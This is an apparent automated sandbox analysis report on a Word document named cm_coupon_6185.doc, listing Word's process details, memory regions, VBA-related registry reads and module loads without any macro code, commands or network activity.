8de655e68ab3408b1101cd0e5f4c3dbe1a361cbb2a5ee10888f5ad30b95332b8 (SHA256)
cm_coupon_6185.doc
Word Document
Created at 2018-11-26 15:52:00
Notifications (1/1)
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
241
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:31, Reason: Self Terminated |
| Monitor Duration | 00:02:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8f8 |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
988
0x
97C
0x
974
0x
96C
0x
968
0x
958
0x
954
0x
950
0x
94C
0x
948
0x
944
0x
940
0x
93C
0x
938
0x
934
0x
930
0x
910
0x
90C
0x
908
0x
904
0x
900
0x
8FC
0x
9A4
0x
A50
0x
A54
0x
A64
0x
A68
0x
620
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00401fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00420fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00431fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00441fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00452fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x01b8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01b90000 | 0x01e5efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001e60000 | 0x01e60000 | 0x02252fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0237ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x02417fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0244ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x0264ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x02650fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002660000 | 0x02660000 | 0x02660fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002670000 | 0x02670000 | 0x02670fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002680000 | 0x02680000 | 0x02680fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002710000 | 0x02710000 | 0x027eefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x02817fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02824fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02831fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02840000 | 0x0284bfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0294ffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x02950000 | 0x02957fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02960000 | 0x0296ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002970000 | 0x02970000 | 0x02970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002980000 | 0x02980000 | 0x02980fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02a90000 | 0x02b4ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02bbafff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02c3ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000002c40000 | 0x02c40000 | 0x02c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d50000 | 0x02d50000 | 0x02d50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02d60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d70000 | 0x02d70000 | 0x02d70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d80000 | 0x02d80000 | 0x02d81fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02d90000 | 0x02d90fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002da0000 | 0x02da0000 | 0x02da0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02eb0000 | 0x02ecffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002ef0000 | 0x02ef0000 | 0x02f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f70000 | 0x02f70000 | 0x0306ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x0316ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003170000 | 0x03170000 | 0x031effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003230000 | 0x03230000 | 0x0332ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003330000 | 0x03330000 | 0x0372ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037e0000 | 0x037e0000 | 0x038dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039b0000 | 0x039b0000 | 0x03aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b10000 | 0x03b10000 | 0x03c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c80000 | 0x03c80000 | 0x03c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x0408ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x041c1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0438ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004390000 | 0x04390000 | 0x0448ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004490000 | 0x04490000 | 0x047d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000047e0000 | 0x047e0000 | 0x04fdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x0510ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051b0000 | 0x051b0000 | 0x0522ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005290000 | 0x05290000 | 0x0538ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053e0000 | 0x053e0000 | 0x054dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005520000 | 0x05520000 | 0x0552ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005620000 | 0x05620000 | 0x0571ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05720000 | 0x0604ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006090000 | 0x06090000 | 0x0618ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000061b0000 | 0x061b0000 | 0x061bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006230000 | 0x06230000 | 0x0632ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006350000 | 0x06350000 | 0x0644ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064d0000 | 0x064d0000 | 0x065cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000065d0000 | 0x065d0000 | 0x066cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000067b0000 | 0x067b0000 | 0x068affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068b0000 | 0x068b0000 | 0x070affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007150000 | 0x07150000 | 0x0724ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000007250000 | 0x07250000 | 0x0824ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000082f0000 | 0x082f0000 | 0x0836ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008510000 | 0x08510000 | 0x0858ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000086e0000 | 0x086e0000 | 0x0875ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008760000 | 0x08760000 | 0x08b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13f230000 | 0x13f40bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| adal.dll | 0x7fee5b90000 | 0x7fee5ca9fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5cb0000 | 0x7fee5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5e30000 | 0x7fee60cafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6200000 | 0x7fee6298fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee62a0000 | 0x7fee630efff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee6310000 | 0x7fee648dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee6490000 | 0x7fee665ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee6660000 | 0x7fee67fcfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fee6800000 | 0x7fee68bffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee68c0000 | 0x7feeaca6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feeacb0000 | 0x7feeb9a4fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb9b0000 | 0x7feebdecfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7feebdf0000 | 0x7feebed1fff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feebee0000 | 0x7feed90bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed910000 | 0x7feee5b6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee5c0000 | 0x7feef08efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feef090000 | 0x7feef773fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef780000 | 0x7fef0704fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef0710000 | 0x7fef2ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef3010000 | 0x7fef309afff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7fef30a0000 | 0x7fef3542fff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef3550000 | 0x7fef358afff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fef35c0000 | 0x7fef365bfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef3660000 | 0x7fef3725fff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x7fef4d40000 | 0x7fef4d5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x7fef4d60000 | 0x7fef4dc1fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x7fef54d0000 | 0x7fef5540fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef59c0000 | 0x7fef59cbfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef5ff0000 | 0x7fef6063fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7fef6100000 | 0x7fef62f1fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 279 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (50)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 231, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 215 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Module (140)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc690000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee3af0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fef92d0000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feffd80000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee42d0000 |
|
2 | |
| Get Handle | c:\program files\microsoft office\root\office16\winword.exe | base_address = 0x13f230000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fefa750000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77a20000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feffd80000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
4 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee3bf72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee3b660b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee3b11a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3b65f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee3b0f000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee3afe860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee3af3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee3b02380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee3af7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee3af7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee3af8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee3c33260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee3c33280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee3b01f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee3b66370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee3b54590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee3af55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee3b00240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee3af3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee3af6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee3af3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee3afe6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee3afdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee3af7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee3affcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee3af8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee3bf2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee3b042c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee3af3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee3afab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee3afa7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee3af1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee3afe830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee3af13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee3af6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee3af1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee3af3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee3bf71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee3bc6d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee3c398e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee3c39830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
